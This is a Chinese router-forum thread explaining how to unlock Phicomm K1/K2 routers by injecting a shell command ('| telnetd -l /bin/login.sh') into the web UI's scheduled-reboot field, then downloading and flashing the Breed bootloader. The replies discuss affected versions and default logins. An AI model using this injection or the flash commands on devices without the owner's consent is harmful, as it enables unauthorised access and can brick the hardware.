QQ登录

只需一步,快速开始

搜索
广告投放联系QQ68610888

k1 v22.4.xx.xx k2 v22.4.xx.xx固件免降级,免刷配置 刷机 刷breed 直接进telnet

火... [复制链接]

上周买了个k1,固件是v22.4.2.15的发现还没办法刷机,论坛只有一种方法,还要刷配置,太麻烦了,周末在家没事就找了个漏洞,这个漏洞在k1 k2新版的固件中都存在,操作上也很简单,我搞了个录像,大家看下就明白了。理论上只要带定时重启功能的版本都可以这样操作
优酷
http://v.youku.com/v_show/id_XMTg3MzY2MjI1Mg==.html

优酷转码后不是很清晰,开启定时重启,里面输入的内容是: 01:00 | telnetd -l /bin/login.sh
百度云:
链接: https://pan.baidu.com/s/1kVDcCTp 密码: a3ai

telnet链接后执行以下命令就行了

1.cd /tmp
2.wget http://breed.hackpascal.net/breed-mt7620-phicomm-psg1208.bin
3.mtd_write write /tmp/breed-mt7620-phicomm-psg1208.bin Bootloader
4.reboot

k1 v22.4.2.15  k2 v22.4.5.39都存在这个漏洞,低版本的应该也都有的
刚才看了下k1s_v22.3.1.5 的固件,这个里面没有这个漏洞但是有很多其他的漏洞,开启telnet应该更容易
k2c 固件我没解开,估计不行,其他的版本我就不试了,大家试下,可以话就说下

a6版本已经有人测过了,也是可以的
https://www.right.com.cn/forum/thread-204435-1-1.html

k2 v22.4.5.42 版本由此漏洞吗?  发表于 2016-12-26 11:00

评分

jeax + 1 亲,你太牛逼了,走,我请你吃鳇鱼头去~~~
七彩土豆泥 + 1 第四步中的01,我的是00????一样修改吗??
huserszm + 1 楼主威武—我就想问问挖掘机技术哪家强?
duxiaoxi + 1 支付宝已转500w给你!
qq869222150 -1 支付宝已转500w给你!
恩山论坛非常好 + 1 我来恩山就是为了看你!
qq1114224722 + 1 一看就是觉得高端、大气、上档次!
159789 + 1 厉害了!!!
Kucami + 1 怀揽白富美的屌丝露出了惊讶的眼神:哥,你太帅了!
谁明知做戏 + 1 支付宝已转500w给你!
航校门口二楼修 + 1 亲,你这么厉害,我想做你的经纪人!
laoxiang + 1 支付宝已转500w给你!
sevill + 1 虽然没试 但是这个如果是真的楼主就太牛了 先评分

我的恩山、我的无线 The best wifi forum is right here.
这么牛,技术达人~~
我的恩山、我的无线 The best wifi forum is right here.

22.4.6.3 可以?

所有的都可以  详情 回复 发表于 2016-12-20 10:53

所有的都可以

你那里有这个固件文件没有,我看斐讯网站上没有下载地址,给我一个我测试下  详情 回复 发表于 2016-12-20 12:03

厉害了我的哥 k2c不知道可不可以建议楼主设置回复可见要不然会沉得很快的

你的是哪个版本的固件,我看下就知道了  详情 回复 发表于 2016-12-20 11:02

航校门口二楼修 发表于 2016-12-20 10:54
厉害了我的哥 k2c不知道可不可以

你的是哪个版本的固件,我看下就知道了

K2C没有V22.XX版本 K2C不提供固件更新,真是坑  详情 回复 发表于 2016-12-21 18:51
V21.4.6.12的 我没有这个路由器 我是替广大网友问问的。还有我转发了你的帖子,你帖子设置一下回复可见啊要不然会沉的。  详情 回复 发表于 2016-12-20 11:08

路过看看,不知道灵不灵

感谢楼主,让我的垃圾路由变废为宝了

powerwheel 发表于 2016-12-20 11:02
你的是哪个版本的固件,我看下就知道了

V21.4.6.12的 我没有这个路由器 我是替广大网友问问的。还有我转发了你的帖子,你帖子设置一下回复可见啊要不然会沉的。

回复可见要不然会沉得很快的

好厉害,把定时重启的01改成 01:00 | telnetd -l /bin/login.sh

是 l 不是 t 01:00 | telnetd -l /bin/login.sh  详情 回复 发表于 2016-12-20 12:41

改成文字,谁试试
1.进入官方固件WEB界面 192.168.1.1/192.168.2.1
2.在官方WEB界面先择“重启”>“定时重启路由器”。
3.在浏览器打开“开发者工具”,用鼠标在官方WEB界面选择时间“01”。
4.在浏览器“开发者工具”中“01”代码修改为“01:00 | telnetd -l /bin/login.sh”。
5.在官方WEB界面直接“保存”。
6.直接用Telnet刷breed。
------------------------------------------------------------------
一.连网方法:
1.使用Putty,Xshell 5等软件,Telnet登录进路由器(4行代码).
------------------------------------------------------------------
1.cd /tmp
2.wget http://breed.hackpascal.net/breed-mt7620-phicomm-psg1208.bin
3.mtd_write write /tmp/breed-mt7620-phicomm-psg1208.bin Bootloader
4.reboot
二.本地方法:
1.使用Winscp软件scp方式进入路由器系统,将breed-mt7620-phicomm-psg1208.bin文件放入/tmp目录下.
2.使用Putty,Xshell 5等软件,Telnet登录进路由器(2行代码).
1.mtd_write write /tmp/breed-mt7620-phicomm-psg1208.bin Bootloader
2.reboot

第四步中的01,我的是00????一样修改吗??  详情 回复 发表于 2017-2-20 13:34
winscp 或putty登录用户名和密码是多少???root adim  详情 回复 发表于 2016-12-25 11:08

Dioxide fending ng

如果真可以这样,那太神了,支持

K2 telnet 用户名密码 是那一个?
admin/admin
root/root
?

直接就能进去吧  详情 回复 发表于 2016-12-20 11:30